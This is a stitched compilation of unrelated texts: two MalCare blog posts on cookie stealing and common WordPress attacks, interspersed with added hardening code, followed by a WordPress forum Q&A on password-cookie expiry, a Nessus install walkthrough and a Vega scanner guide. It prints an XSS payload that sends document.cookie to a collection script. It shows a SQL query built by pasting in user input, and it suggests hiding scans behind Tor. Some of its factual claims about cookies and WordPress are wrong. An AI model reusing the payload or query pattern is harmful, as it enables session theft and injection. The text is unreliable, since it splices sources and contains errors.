Jan 31, 2020

by Melinda Bartley

Did you know that your website uses cookies to store confidential data? Did you know hackers can easily steal your cookies? This could put your website and visitors at risk!

Cookies store all sorts of information – from ad preferences of a customer to login credentials and credit card information. Cookies are used widely across the internet and it’s scary just how often they get stolen.

If you’re a victim of cookie stealing or session hijacking, the repercussions of it are severe. Not only do you lose revenue and the trust of your visitors but you could also face legal issues and hefty fines!

But not to worry because today, we’re going to take you through everything you need to know to prevent these attacks!

In this guide, we’ll first learn how hackers steal cookies then we’ll go through the preventive measures.

TL;DR

Worried about your WordPress website? You can secure your site right now by installing a Session Hijacking & Cookie Stealing Protection Plugin. It will scan your website regularly and alert you if a hacker injects any malicious code that will enable them to steal cookies. Using the plugin, you can clean up the hack promptly & avoid repercussions.

Table of Contents

What Is Cookie Stealing?

How Hackers Use Cross-site Scripting (XSS) To Steal Cookies & Hijack Sessions

How To Prevent Cookie Stealing And Session Hijacking

Steps Website Visitors Can Take Against Cookie Stealing

What Is Cookie Stealing?

As much as we wish, cookie stealing isn’t as simple as a child sticking their hand into a cookie jar! It’s a complex process and to understand what is happening, we need to touch upon the basics.

→ What Is A Cookie?

You can think of cookies as tiny bits of data that store information about your interaction with a website. For example, an eCommerce site would like to track a customer’s journey – the products searched for, products purchased, items abandoned in the cart, or which pages they visit.

This gives the store analytical information on what customers prefer, which pages are being visited the most, how long users stay on a page, etc. They can then use this information to tailor what’s displayed on the website according to the customer’s preferences.

Cookies give website owners insight into what works and what doesn’t. This helps them determine what they need to change or improve on their site.

Cookies are also used to display relevant ads to users. When you visit websites, you would notice advertisements being displayed.

These ads usually reflect your recent search history. For example, if you searched for ‘laptops’ on Google, you’ll notice that ads on all websites show you ads for Dell. These ads are not a part of the website but are handled by services like Google AdSense.

Cookies make things convenient for both the website owner and the user. They can boost engagement and lead to more sales, which is great for website owners. As for the buyer, cookies give them a more personalized experience on a website and show them ads that are more relevant.

But there are a lot of drawbacks which we’ll discuss a bit later.


→ What Is A Browser Session and Session ID?

When you log into a website, a session between your computer and this website is created.

For example, when you log into Facebook, a session begins. This allows you to keep using Facebook (even if you close and reopen the web browser) until you click on ‘log out’ and end the session.

If the session wasn’t created, you would need to keep logging in every time you wanted new data. For example, if you wanted to leave your Facebook news feed and view a friend’s profile page, you would be logged out of Facebook and would need to enter your credentials again to log in and view the friend’s profile.


This is why sessions are needed. It keeps you logged in so that you can continue to browse through different web pages and navigate the website.

What’s important to note here is that every session generates a set of cookies. We can call these session cookies. And each session cookie has a unique session ID.

A website uses this ID to authenticate the user and establish a trusted connection.

For example, to log in to Facebook, you need to enter your username and password. Next, a session is created with a unique ID. Any requests you make to the Facebook website will be authenticated with this ID. So, when you want to view a different page, you would be sending a request to the Facebook server to display that page. Facebook verifies the ID and displays the content you wish to see.

Now, hackers can hijack your session and abuse this trusted connection. They can send malicious requests on your behalf. Let’s see how.


→ What Are The Security Concerns With Cookies?

When cookies are generated, they can only be viewed by you – the site owner. No other website can view your cookies. They belong solely to you.

But these cookies travel across the internet. They are used by ad services and analytics services. So these cookies bounce around from server to server all across the globe. If the connection is not secure, a hacker can easily intercept and steal these cookies.

Now, you may think that if a hacker manages to get information about your shopping preferences, big deal, right?

The problem is that cookies store more than just information about your shopping preferences. They also store bank details and personal information such as your shipping address and contact details.

If this kind of information falls into the wrong hands, it can be misused for fraudulent activities.

One of the most common ways hackers steal cookies is by using the same Wi-Fi network as you. This kind of Wi-Fi hacking is called a man-in-the-middle attack and can take place only if both parties are connected to the same wireless network. This is why it’s advised to never use public Wi-Fi that is unsecured or used by many. This can also happen to users within the same computer network.

A few other methods include packet sniffing and exploiting a vulnerability called cross-site scripting (XSS). Today, we’re going to show you in detail how XSS cookie stealing works.


How Hackers Use Cross-site Scripting (XSS) To Steal Cookies & Hijack Sessions

To show you how hackers steal cookies using cross-site scripting (XSS) attacks, we’ll use an example. Let’s assume you visit a website that has a comments section on it.

Any comment you make will be sent to the website’s database. Ideally, this comments section should be configured to accept only text in plain English. But if it accepts special characters as well, this makes it vulnerable to XSS.

A hacker can enter their own malicious code, which will be sent to the database. Once inside, the code will get executed. There are numerous scripts hackers can insert into the website to run all sorts of malicious activities, like creating a new website admin or stealing cookies.

To steal cookies, a hacker can enter the following code:

Note: This is not a tutorial on how to steal cookies. This article is intended to make website owners aware of how hackers can steal cookies. We do not advise you to carry out any illegal activities.

 

document.write('<img src="http://localhost/submitcookie.php?cookie=' + escape(document.cookie) + '" />');

In the comments section, this code will appear as an image. If you (as a visitor) click on it, you will see an image displayed. But more than that has happened.

When you click on the image, this PHP file silently executes the code and grabs your session cookie and the session ID.

Now the hacker can recreate your session and pose as you on that website. They can carry out a multitude of malicious acts. For example, if your cookie contains your credit card or any other payment information, they can make purchases.
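As an added example (not code from the article), here is the server-side view of the same attack in plain PHP: a comment renderer that echoes input raw beside one that encodes it, and the cookie flags that keep a session cookie out of document.cookie in the first place. The function names and the sample comment are constructed for this illustration.

```php
<?php
// Added example, not from the original article. A minimal comment renderer,
// shown first the vulnerable way and then hardened. Function names and the
// sample comment below are constructed for illustration.

// Constructed sample: a comment carrying the payload shape the article shows.
$sample_comment = "Nice post! <script>document.write('<img src=\"http://localhost/submitcookie.php?cookie=' + escape(document.cookie) + '\" />');</script>";

// Vulnerable: echoes the stored comment verbatim, so the browser parses the
// <script> tag and runs it with the site's cookies in scope.
function render_comment_vulnerable(string $comment): string {
    return '<li class="comment">' . $comment . '</li>';
}

// Hardened: HTML-encode at output time. Readers still see the comment text
// exactly as typed, but < > " ' & become entities, so the browser treats the
// whole comment as text rather than markup.
function render_comment_safe(string $comment): string {
    $escaped = htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<li class="comment">' . $escaped . '</li>';
}

// Second layer: a cookie flagged HttpOnly is not exposed through
// document.cookie, so even a script that does run would send an empty value.
// Secure restricts it to HTTPS and SameSite=Strict keeps it off cross-site
// requests. The options-array form of setcookie() needs PHP 7.3 or later.
function issue_session_cookie(string $session_id): bool {
    return setcookie('sid', $session_id, [
        'expires'  => 0,        // session cookie: discarded when the browser closes
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}

// In WordPress the equivalents of htmlspecialchars() are esc_html() for plain
// text and wp_kses_post() for comments that may contain limited HTML.
echo render_comment_safe($sample_comment), PHP_EOL;
```

Note that WordPress already sets its own login cookies with the HttpOnly flag; the flags matter for any additional cookies a theme or plugin issues.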

Luckily, there are preventive measures to safeguard website owners as well as its visitors from these hacks.


How To Prevent Cookie Stealing And Session Hijacking

There are two parties that play a role in preventing cookie theft and session hijacking – the website owner and the visitor. We’ll discuss preventive measures for both sides.

Measures Website Owners Can Take Against Cookie Stealing

As a website owner, if you don’t have a security analyst to handle it all for you, you need to implement the following preventive measures:

1. Install an SSL Certificate

Data is transferred constantly between the user’s browser and your web server. Without SSL, this data (cookies) is sent in plain text. If a hacker intercepts this data, they can simply read it. So if it contains login credentials, it will be exposed.


SSL (Secure Sockets Layer) will encrypt the data before it’s transferred. So even if a hacker manages to steal it, they can’t read the data.

You can get an SSL certificate through your web hosting company or from an SSL provider. You can also get a basic free SSL certificate from Let’s Encrypt.

2. Install a Security Plugin

Keep a WordPress security plugin such as MalCare active on your website. The plugin’s firewall will prevent hack attempts on your website and block malicious IP addresses. Plus, it will scan your site regularly and alert you if any malicious code has been entered by a hacker. You can clean up your website instantly. This will help you detect and delete such hack attempts immediately before they cause any harm.

3. Update Your Website

Always keep your website up to date; this includes the WordPress installation, themes, and plugins. Running outdated software opens many vulnerable spots on your website that hackers can exploit. Ensure you update your site as and when a new update is available.


These updates not only carry new features and bug fixes, but they also fix security flaws from time to time.

4. Harden Your Website

WordPress.org recommends certain website hardening measures that you should implement on your website. These include using strong and unique usernames and strong passwords, blocking PHP execution in unknown folders, disabling the file editor for themes and plugins, and more. This may all sound like jargon to you, so we’ve created an in-depth step-by-step guide to WordPress Hardening that you can follow.


Steps Website Visitors Can Take Against Cookie Stealing

As a website visitor, you don’t have to blindly trust that websites have taken appropriate security measures. You can protect yourself with the following web security protocols.

1. Install an Effective Anti-virus

Ensure the device you’re using to access the internet has anti-malware software installed. This will alert you if malware is detected when you visit a malicious website. It will also remove any malware that you might accidentally download or install on your system.

2. Never Click on Suspicious Links

Hackers target users through the comments section on websites and through emails. Avoid clicking on untrusted links especially ones that lure you with attractive offers or discounts.

3. Avoid Storing Sensitive Data

Storing credit card information on shopping websites makes checkout faster and more convenient. Saving passwords on web browsers like Google Chrome to auto log into websites eliminates the need to remember passwords!

But it all comes with a high risk of being stolen. It’s best to never store sensitive data on websites. It may save you a few seconds, but it also puts you at risk of being attacked.

4. Clear Cookies

You can clear your cookies regularly to get rid of any sensitive information stored in browsers like Google Chrome. Access History > Clear Browsing History. Here, tick the checkbox ‘Cookies and other site data’.


Choose the time range ‘All Time’ or one that is according to your preference. Next, click ‘Clear data’ and the cookies will be deleted from your browser’s history.

That brings us to the end of our guide to cookie stealing. We hope this article has helped you gain a better understanding of what exactly happens and how to prevent it.


Final Thoughts

As a website owner, you need to take protective measures to secure your own interests as well as your visitors, clients, and customers. But we understand that setting up a website and managing it is a hard task.

There is an endless number of things to take care of which is why WordPress security tends to take a backseat many times.

But ignoring the security aspect of your website can prove to be disastrous to all your other efforts.

An easy, quick and efficient solution is the MalCare security plugin. You can think of it as a security guard that you hire. It will work round the clock to regularly scan your website and protect it from attacks. You can rest assured that your website is in safe hands.


remoted

Remoted's IT LAB & POST DATABASE

Are you worried that hackers will attack your WordPress website? We wish we could’ve told you not to worry but the truth is WordPress websites are constantly targeted by hackers. This is mainly on account of its popularity as WordPress powers a third of all the websites on the internet.

While WordPress itself is a secure website building platform, it does not function alone. You need plugins and themes to run a WordPress site. Plugins and themes often develop vulnerabilities which hackers exploit to hack a website.

Once they have access to your website, they run all sorts of malicious activities like stealing sensitive information, defrauding customers and displaying illegal content. Meanwhile, you can be blacklisted by Google, or even get suspended by your web host. All this leads to a loss of visitors and revenue.

While WordPress developers keep the platform as secure as it can be, WordPress site owners also need to take measures on their own. In this article, we discuss the most common attacks on WordPress sites and the preventive measures you can take against them.

TL;DR

If you are worried about hackers attacking your WordPress website, you can take website protection measures immediately. You can install our WordPress security plugin MalCare. It will scan and monitor your site every day and block hackers from trying to break in.


Why Is WordPress A Popular Target For Hackers?

WordPress is a website building platform that enables anyone to build websites without knowing how to code. Moreover, WordPress is free of cost.

As a result, the platform is powering over 1.3 billion active sites today.

The downside of all this is that WordPress websites are targeted more than websites built on any other platform.

Now there are multiple ways in which hackers can break into your site. We’ve narrowed it down to the 5 most common ones. We’ll explain what happens and how you can protect your WordPress site against it.


5 Most Common Attacks on WordPress Websites

1. Vulnerable Plugins and Themes

A WordPress site is created using three elements – the core installation, themes and plugins. All three elements have the potential to make a site vulnerable to hacks.

For many years, there hasn’t been any major vulnerability in the WordPress core. It is maintained by a team of highly experienced and qualified developers. They work hard at ensuring the platform is completely secure so you have nothing to worry about there.

However, WordPress plugins and themes are created by third-party developers and they tend to develop WordPress vulnerabilities quite often.

When developers discover any vulnerability, they promptly fix it and release an updated version.


You, the site owner, need to update to the latest version and your site will be secure. It’s important to install such security updates immediately. This is because when developers release an update, they also release the reasons for the update. Thus, the vulnerability is announced to the public.

This means hackers now know that a vulnerability exists. They also know that not all site owners update their sites immediately. So once they find out that a plugin or theme is vulnerable, they program bots and scanners to crawl the internet and find sites that are using them. Knowing exactly what the vulnerability is makes it easy for them to exploit and break in.

How to Protect Your Site Against Vulnerable Plugins & Themes

    • Only use trusted themes and plugins found in the WordPress repository or marketplaces like ThemeForest and CodeCanyon.
    • Check your plugin list regularly and keep only the ones you use. Delete any that you don’t need or that are inactive.
    • Ideally, you should keep only the theme that you are actively using.
    • Never use pirated themes and plugins. They usually contain malware that will infect your website.
    • Ensure you recognise all the plugins and themes on your site. Sometimes hackers install their own plugins and themes that have website backdoors built in. This gives them secret access to your site.

2. Brute Force Attacks

To log in to your WordPress site, you need to enter your login credentials, i.e., a username and password.

Many times, WordPress site owners use usernames and passwords that are easy to remember. Many WordPress users retain the default username ‘admin’. Common passwords include ‘password123’ or ‘1234567’.

Hackers are well aware of this and attack the login page of WordPress sites.


They create a database of commonly used usernames and passwords. Next, they program bots to target WordPress sites and attempt different combinations present in their database.

If your login credentials are weak, the bots have a high chance of guessing them and breaking into your site. This is known as a ‘Brute Force Attack’, and such attacks are estimated to have a 10% success rate!

How to Protect Your Site Against Brute Forcing

There are a couple of steps you can take to secure your site against brute force attacks:

    1. By default, your WordPress username is admin. You can change it from admin to something more unique.
    2. Use a strong WordPress password. We suggest using a passphrase in combination with numerals and symbols such as Birdsofafeather123$.
    3. Use unique credentials that you have not used on other websites.
    4. Limit the number of login attempts on your site. This means a WordPress user will have only limited chances to enter the right credentials such as 3 attempts or 5 attempts. After this, they will need to use the ‘forgot password’ option. You can install our MalCare security plugin on your site and it will automatically implement this login protection for you.
    5. Use two-factor authentication, wherein a WordPress user has to enter their credentials along with a one-time password that is generated on their smartphone or sent to their registered email address.
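The login-attempt limit in step 4, as an added example written for this guide rather than MalCare’s or WordPress core’s code: a small must-use plugin that counts failed logins per client IP with WordPress transients and refuses further attempts once the limit is reached. The limit and lockout length are illustrative constants, and the hook names are real WordPress hooks.

```php
<?php
/**
 * Plugin Name: Login Attempt Limiter (added example)
 *
 * Added example, not MalCare's or WordPress core code. Limits failed login
 * attempts per client IP using WordPress transients. Place it in
 * wp-content/mu-plugins/ (a must-use plugin) or in a theme's functions.php.
 * The two constants are illustrative choices, not WordPress defaults.
 */

const LAL_MAX_ATTEMPTS    = 5;                        // failures allowed before lockout
const LAL_LOCKOUT_SECONDS = 15 * MINUTE_IN_SECONDS;   // how long the lockout lasts

// Key the counter on the client address. REMOTE_ADDR is used because the
// client cannot forge it; behind a reverse proxy you would read the trusted
// forwarded header your proxy sets instead.
function lal_transient_key(): string {
    $ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
    return 'lal_' . md5($ip);
}

// Count each failed login. wp_login_failed fires after WordPress rejects the
// credentials, for both wp-login.php and XML-RPC. Re-setting the transient
// on every failure restarts the lockout window (a sliding window).
function lal_record_failure(string $username): void {
    $key      = lal_transient_key();
    $attempts = (int) get_transient($key);   // false (no transient) becomes 0
    set_transient($key, $attempts + 1, LAL_LOCKOUT_SECONDS);
}
add_action('wp_login_failed', 'lal_record_failure');

// Refuse to check the password at all once the limit is reached. Priority 30
// runs after core's username/password and email/password handlers (priority
// 20), so a WP_Error returned here overrides any WP_User they produced.
function lal_block_when_locked($user, string $username, string $password) {
    $attempts = (int) get_transient(lal_transient_key());
    if ($attempts >= LAL_MAX_ATTEMPTS) {
        return new WP_Error(
            'too_many_attempts',
            sprintf(
                'Too many failed login attempts. Try again in %d minutes or use "Lost your password?".',
                LAL_LOCKOUT_SECONDS / MINUTE_IN_SECONDS
            )
        );
    }
    return $user;
}
add_filter('authenticate', 'lal_block_when_locked', 30, 3);

// Clear the counter on a successful login so a legitimate user is not
// penalised later for an earlier typo.
function lal_reset_on_success(string $user_login, WP_User $user): void {
    delete_transient(lal_transient_key());
}
add_action('wp_login', 'lal_reset_on_success', 10, 2);
```

Keying on the IP address means everyone behind a shared NAT is locked out together, and a bot spread across many addresses is slowed rather than stopped; the two-factor step above is what makes a guessed password insufficient on its own.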

3. Injection Attacks

Almost every website has an input field like a contact form, a site search bar, or a comments section that enables visitors to enter data. Some websites also allow visitors to upload documents and image files.

Usually this data is accepted and sent to your database to be processed and stored. These fields need proper configuration to validate and sanitise the data before it goes to your database. This will ensure that only valid data is accepted. If these measures are lacking, hackers exploit it and enter malicious code.

Let’s take an example of a WordPress site that has a contact form on it. Ideally this form should accept a name, an email address, and a phone number.


    1. The name field should accept only letters of the alphabet.
    2. The email address field should accept a valid email address format such as example@mysite.com.
    3. The phone number field should contain only digits.

Now if these configurations aren’t in place, a hacker can target code that pastes the submitted value straight into a database query, such as:

String userLoginQuery = "SELECT user_id, username, password_hash FROM users WHERE username = '" + request.getParameter("user") + "'";

This code builds the database command out of whatever was typed into the ‘user’ field, so anything the hacker enters there becomes part of the instructions the database executes. In this way, hackers are able to run malicious scripts on your site which they can use to gain full control of your site.

The most popular injection attacks on WordPress sites include SQL injection attacks and Cross-Site Scripting.

How to Protect Your Website Against Injection Attacks

    1. Many injection attacks stem from themes and plugins that enable visitor input on your site. We suggest using only trusted themes and plugins. Next, keep your plugins and theme up to date always.
    2. Control field entries and data submissions. This is technical and would require a developer’s assistance.
    3. Use a WordPress firewall. If you’ve installed MalCare on your site, it automatically puts up a robust firewall to defend your site against hackers.
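An added example (not from the article) of what item 2 involves: the three validation rules for the contact form as allow-list checks in plain PHP, and the users lookup from the snippet above rewritten with a bound parameter so the submitted value can never become part of the query text. Function names and the sample submissions are constructed.

```php
<?php
// Added example, not code from the original article. Server-side validation
// for the three-field contact form described above, then a parameterised
// version of the users lookup shown earlier. Function names and the sample
// submissions are constructed for this example.

// Returns a list of error messages; an empty list means the submission is valid.
// The rules mirror the article: name = letters only, email = valid format,
// phone = digits only. Validation is an allow-list: input that does not match
// the expected shape is rejected rather than "cleaned up".
function validate_contact_form(array $data): array {
    $errors = [];

    $name = trim($data['name'] ?? '');
    // \p{L} matches letters in any script; spaces, hyphens and apostrophes are
    // allowed so that real names such as "O'Neil-Smith" still pass.
    if ($name === '' || !preg_match("/^[\p{L}' -]{1,100}$/uD", $name)) {
        $errors[] = 'Name may contain letters, spaces, hyphens and apostrophes only.';
    }

    $email = trim($data['email'] ?? '');
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'Email address is not valid.';
    }

    $phone = trim($data['phone'] ?? '');
    if (!preg_match('/^[0-9]{6,15}$/D', $phone)) {
        $errors[] = 'Phone number may contain digits only.';
    }

    return $errors;
}

// The lookup from the article, done safely: the user value reaches the
// database as a bound parameter, never as part of the SQL text, so quotes or
// SQL keywords inside it are treated as data. The WordPress equivalent is
// $wpdb->prepare("SELECT ... WHERE user_login = %s", $username).
function find_user(PDO $db, string $username): ?array {
    $stmt = $db->prepare(
        'SELECT user_id, username, password_hash FROM users WHERE username = :username'
    );
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed submissions: one clean, one with input that only a format check
// catches (markup in the name, a malformed address, letters in the phone).
$clean   = ['name' => 'Ada Lovelace', 'email' => 'ada@example.com', 'phone' => '02079460000'];
$hostile = ['name' => 'Ada<script>',  'email' => 'not-an-email',    'phone' => 'call-me'];

$clean_errors   = validate_contact_form($clean);     // no errors
$hostile_errors = validate_contact_form($hostile);   // one error per field
```

Validation and parameterised queries are complementary: the format checks keep junk out of your data, while binding the parameter is what actually prevents the injection, even for a field (such as a free-text message) whose shape cannot be pinned down.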

4. Phishing and Data Theft

Visitors interact with your website in different ways. Some of them just read your blog posts, others contact you through your contact form, and so on. If you run an ecommerce site, then many visitors buy items from your website. This means they need to log into your website and enter credit card information.

When someone enters credit card information to your site, it transfers and stores the information on your site server. This information can be intercepted while it’s being transferred. Moreover, the credit card data can be stolen.

Hackers may also break into your website and pose as you. They send emails or redirect visitors to other websites and trick them into revealing personal data and payment information.

How To Protect Your Site From Phishing and Data Theft

    1. Use an SSL certificate. This will encrypt the data that’s being transferred from and to your site. Even if a hacker intercepts it, they cannot use it as they won’t be able to decipher it. Refer to our guide on using SSL and HTTPS.
    2. Use a WordPress Security Plugin to receive alerts if there’s any suspicious activity on your website. The plugin will also block hack attempts.

5. Cookie Stealing

Have you noticed that when you log into a site, your browser offers to ‘remember me’ or ‘save password’? This is done so that you don’t have to enter your login credentials every time you want to access a website. You can opt to allow the browser to save your login details.


Browsers can save such data because of cookies. Cookies are tiny bits of data that record a visitor’s interaction with a website. For instance, if you run an online store, your site might track a customer’s journey such as what product they searched for and what they purchased. This data is used in analytics and also advertisers tailor ads to the visitor’s preference. Now, cookies can also store bank details and personal information.

If a hacker is able to steal your website’s cookies, they can access sensitive data of your business and your visitors. They can exploit this data to carry out their malicious acts such as defrauding customers by using their credit card information.

You can read up more on this in our easy guide to Cookie Stealing and Session Hijacking.

How To Protect Your Site From Cookie Stealing and Session Hijacking

    • Change your WordPress keys and salts regularly. Keys and salts provide secure encryption of the information stored in the browser’s cookies. This measure is technical in nature. We recommend using MalCare’s WordPress hardening feature to change your keys and salts. From the MalCare dashboard, access Security > WordPress hardening > Change WordPress Security Keys and Salts.


    • Here too, we recommend installing an SSL certificate to protect your website’s data.

That brings us to an end on the most common WordPress Attacks. Before we wrap up, we’d like to show you a few WordPress hardening measures that will make your site stronger against such attacks.


How To Harden Your WordPress Site Against Attacks

While you can take specific measures to protect your website against certain attacks, there are some overall security measures you can implement on your site for better protection. These are called WordPress hardening measures. We’ve explained it in brief here, but you can read our in-depth guide on WordPress Hardening for more detailed explanations.

1. Disabling the file editor

WordPress has a feature that enables you to edit theme and plugin files directly from the dashboard. Many website owners don’t need this feature; it is mostly used by developers. But if a hacker breaks into your wp-admin dashboard, they can inject malicious code into your theme and plugin files. Thus, if you don’t need this feature, it can be disabled.

2. Disabling plugin or theme installations

When hackers can access your site, they install their own plugins or themes. These plugins and themes are usually malicious and contain backdoors. This gives hackers a secret entry into your site.

Plus, as we mentioned, vulnerable themes and plugins are a top cause of hacked sites. If you have multiple users on your website, they may install a plugin or theme that isn’t secure. This can open up your site to hackers. If you want to avoid this, you can disable plugin and theme installations on your site.

If you don’t regularly install plugins and themes on your site, you can disable the installation option.

3. Limiting login attempts

As we mentioned before, you can limit the number of chances a WordPress user has to enter the correct login credentials to enter the site. This eliminates the risk of brute force attacks.

4. Changing security keys and salts

Keys and salts encrypt the information stored in your browser. So even if a hacker manages to steal your cookies, they can’t decipher it. However, if a hacker accesses these keys and salts, they can use it to decrypt the cookies. Regularly changing your keys and salts can help avoid cookie theft.

5. Blocking PHP execution in unknown folders

There are only certain files and folders on your WordPress site that execute code. Other folders only store information such as your Uploads folder that stores images and videos.

However, when a hacker gains access to your website, they insert PHP code into random folders or even create their own folders.

You can block such activity by disabling PHP executions in unknown folders.
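The settings behind measures 1, 2, 4 and 5, and behind the keys-and-salts advice in the cookie-stealing section above, as an added wp-config.php example that is not from the article or MalCare; the constants are real WordPress configuration constants, and the key values are placeholders to be replaced with freshly generated ones.

```php
<?php
// Added example, not from the article or MalCare. These go in wp-config.php,
// above the line that reads "That's all, stop editing!". The key values are
// obvious placeholders (the same ones wp-config-sample.php ships with).

// 1. Disable the theme and plugin file editor in the dashboard.
define('DISALLOW_FILE_EDIT', true);

// 2. Disable plugin and theme installation, update and deletion from the
//    dashboard (this implies DISALLOW_FILE_EDIT as well). Only enable it if
//    you deploy plugins another way, such as WP-CLI or your hosting panel,
//    because it also blocks the one-click updates the article recommends.
define('DISALLOW_FILE_MODS', true);

// 4. Security keys and salts. WordPress signs its login and password cookies
//    with these, so rotating them invalidates every existing session cookie,
//    including any copy a thief has taken. Generate fresh values from
//    https://api.wordpress.org/secret-key/1.1/salt/ and paste them here.
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');

// Serve the login page and dashboard over HTTPS only, so the login cookies
// are never sent in plain text (requires the SSL certificate from step 1).
define('FORCE_SSL_ADMIN', true);

// 5. Blocking PHP execution in wp-content/uploads is done by the web server,
//    not in wp-config.php. For Apache 2.4, a wp-content/uploads/.htaccess
//    file containing the following denies every request for a .php file
//    in that tree:
//
//      <FilesMatch "\.php$">
//          Require all denied
//      </FilesMatch>
//
//    The Nginx equivalent inside the server block is:
//
//      location ~* /wp-content/uploads/.*\.php$ { deny all; }
```

After rotating the keys every user, including you, is logged out and has to sign in again; that is the intended effect, so schedule it accordingly.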

Implementing these measures requires technical expertise. We don’t recommend doing it manually. It’s much safer and easier to use a plugin like MalCare that lets you do this in just a few clicks.


With that, we’re confident your WordPress website is secured and protected against hackers.


Final Thoughts

Hackers have a multitude of ways to break into your WordPress site and they come up with new ones ever so often!

You need to take your security measures to protect your website and ensure it’s safe against hack attacks.

We recommend using our MalCare Security Plugin to secure your WordPress site. It will block hackers and malicious bots from accessing your site. You can rest assured your site is being monitored and protected.


 

The post 5 Most Common WordPress Attacks & How To Prevent Them appeared first on MalCare.

 


*** This is a Security Bloggers Network syndicated blog from MalCare authored by Melinda Bartley. Read the original post at: https://www.malcare.com/blog/wordpress-attacks/


I'm using WordPress for a specific client because of their need to edit content themselves. With this, I'm using their page password protection, per the client's request. The problem is, it seems that the cookie being set never times out. So, once the client enters the password, nobody ever has to enter the password again through the same browser on the same machine. This leaves it wide open for anybody to walk up to and enter. So, I assume the best way to address this is to set a timeout on the cookie. However, I'm not sure how to do that with the PHP function. Here's the whole function:

function post_password_required( $post = null ) {
    $post = get_post($post);

    if ( empty( $post->post_password ) )
        return false;

    if ( ! isset( $_COOKIE['wp-postpass_' . COOKIEHASH] ) )
        return true;

    require_once ABSPATH . WPINC . '/class-phpass.php';
    $hasher = new PasswordHash( 8, true );

    $hash = wp_unslash( $_COOKIE[ 'wp-postpass_' . COOKIEHASH ] );
    if ( 0 !== strpos( $hash, '$P$B' ) )
        return true;

    return ! $hasher->CheckPassword( $post->post_password, $hash );
}

Really, I'd like to have the cookie expire when the browser closes, and otherwise every few hours. Any advice on what to add to make the cookie expire after it's set?

I believe it would probably have to be added to this line:


$hash = wp_unslash( $_COOKIE[ 'wp-postpass_' . COOKIEHASH ] );

Thanks ahead of time for any advice.


There's a much, much easier way to do this, using the post_password_expires filter. By default, the cookie expires 10 days from creation. To turn this into a session cookie, return 0. The following should be added to your theme's functions.php:


function custom_password_cookie_expiry( $expires ) {
    return 0;  // Make it a session cookie
}
add_filter( 'post_password_expires', 'custom_password_cookie_expiry' );


https://developer.wordpress.org/reference/hooks/post_password_expires/


Nessus is an automated vulnerability assessment system.
For personal use, the Home version is free of charge (an activation code must be obtained).

Go to the Nessus homepage

Installation manual page (English)

1. Go to the Nessus homepage

2. Product > Nessus Download

3. Click Agree and download the package to Kali Linux

4. After installing Nessus, start the service
Installation manual page (English)

root@kali:~/Downloads# dpkg -i Nessus-6.5.6-debian6_amd64.deb 
Selecting previously unselected package nessus.
(Reading database ... 298931 files and directories currently installed.)
Preparing to unpack Nessus-6.5.6-debian6_amd64.deb ...
Unpacking nessus (6.5.6) ...
Setting up nessus (6.5.6) ...
Unpacking Nessus Core Components...
nessusd (Nessus) 6.5.6 [build M20049] for Linux
Copyright (C) 1998 - 2015 Tenable Network Security, Inc

Processing the Nessus plugins...
[##################################################]

All plugins loaded (1sec)

 - You can start Nessus by typing /etc/init.d/nessusd start
 - Then go to https://kali:8834/ to configure your scanner

Processing triggers for systemd (228-4) ...
root@kali:~/Downloads# /etc/init.d/nessusd start
Starting Nessus : .



5. Open the web interface
 . https://localhost:8834
 . Click "I Understand the Risks"
 . Click "Add Exception"
 . Confirm Security Exception

6. Click Continue

7. Create an account for logging in to the Nessus server
 . Enter the username and password you will use on Kali Linux

8. Register Nessus and obtain the Activation Code
 . After registering at http://www.tenable.com/products/nessus-home, the Activation Code is sent by e-mail

9. Nessus installation complete

Source: https://vmos.tistory.com/13 [이것저것]



Withstanding an attack from a motivated hacker is one of the most important responsibilities a system administrator must undertake. This is especially true for websites that may contain sensitive customer information and a high volume of users. So it's important for a sysadmin to take proactive measures to find and fix vulnerabilities in their websites.

One tool that can help do this is Vega Vulnerability Scanner, a free, open-source, graphical web-auditing tool developed by the security company Subgraph. This tool contains several interesting features such as a proxy scanner, but we'll be focusing on the automated security testing aspect that can help us find and validate SQL injection, cross-site scripting (XSS), inadvertently disclosed sensitive information, and many other vulnerabilities.

There are similar web application scanners to Vega. PortSwigger's Burp Suite Scanner and Netsparker's Security Scanner both offer premium vulnerability scanners, but Vega's scanner can perform many of the same tasks at no cost. Vega's scanner makes finding and understanding the severity of web application vulnerabilities simple by clearly and concisely displaying useful resources with every scan.

Step 1: Install Vega

Since the Vega Vulnerability Scanner usually comes preinstalled on most versions of Kali Linux, you should be good to go if you're using a Kali system. If you're not sure whether or not your Kali setup has it already, you can run the apt-get command seen below in a terminal. You'll get a message saying it's already installed if you do have it already, and if not, it will install it for you.

apt-get update && apt-get install vega

If you're using the BlackArch penetration testing distribution, you can install the Vega Vulnerability Scanner with the command below. BlackArch doesn't use the APT package manager, so we'll use Pacman. I won't be going over any other BlackArch-specific details in the following steps, but it's a similar process, so it shouldn't be too hard for you to follow along.

pacman -S vega

Step 2: Start Vega

In Kali Linux, tools are automatically sorted into categories, so click on "Applications," then hover over the "Web Application Analysis" category, and click on "Vega." Depending on if you're using something like XFCE, a lightweight version of Kali, the Applications menu may look a bit different. You could also just search for "Vega" from the "Show Applications" screen.

Step 3: Configure Vega

After starting an application for the first time, I like to view the available preferences and options. In the top-left corner, click on the "Window" menu, then view the "Preferences," which I'll walk you through in the next two steps.

Proxy Vega HTTP Requests (Optional)

If you prefer to anonymize your Vega scans and proxy all connections, check the "Enable SOCKS proxy" option under General, and enter a proxy address and port. If you're using Tor, enter the default Tor address and port (127.0.0.1:9050). This will help conceal the origin of your scans. Otherwise, if you're using a free or premium proxy service, choose the address and port you prefer.

Use Tor's User-Agent (Optional)

If you decide to proxy Vega scans over Tor, you may also consider changing Vega's user-agent to the Tor Browser user-agent. This will help you access some (but not all) websites that block Tor HTTP requests.

